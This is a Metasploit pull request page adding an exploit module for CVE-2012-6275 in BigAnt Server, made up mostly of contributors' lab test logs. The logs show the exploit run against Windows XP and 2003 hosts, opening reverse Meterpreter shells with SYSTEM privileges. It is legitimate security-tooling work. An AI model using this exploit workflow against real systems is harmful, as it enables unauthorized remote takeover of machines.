Added module for CVE-2012-6275 #1499

Merged
merged 1 commit into from Feb 19, 2013

Conversation

jvazquez-r7
Contributor

Tested successfully with BigAnt Server 2.97 SP7 on Windows XP SP3 and Windows 2003 SP2:

msf  exploit(bigant_server_dupf_bof) > use exploit/windows/misc/bigant_server_sch_dupf_bof 
msf  exploit(bigant_server_sch_dupf_bof) > set rhost 192.168.1.147
rhost => 192.168.1.147
msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows XP SP3...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.147:1550) at 2013-02-17 20:19:01 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(bigant_server_sch_dupf_bof) > set target 1
target => 1
msf  exploit(bigant_server_sch_dupf_bof) > set rhost 192.168.1.155
rhost => 192.168.1.155
msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows 2003 SP2...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 192.168.1.155
[*] Meterpreter session 6 opened (192.168.1.128:4444 -> 192.168.1.155:1034) at 2013-02-17 20:20:11 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@jvazquez-r7
Contributor Author

The vulnerable app can still be found at the home page at the time of this PR:

http://www.bigantsoft.com/

@wchen-r7
Contributor

Tested:

msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.0.1.3:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows XP SP3...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 10.0.1.17
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.17:1170) at 2013-02-19 11:34:16 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 1a2a0bc into rapid7:master Feb 19, 2013
@jvazquez-r7 jvazquez-r7 deleted the bigant_server_sch_dupf_bof branch November 18, 2014 15:44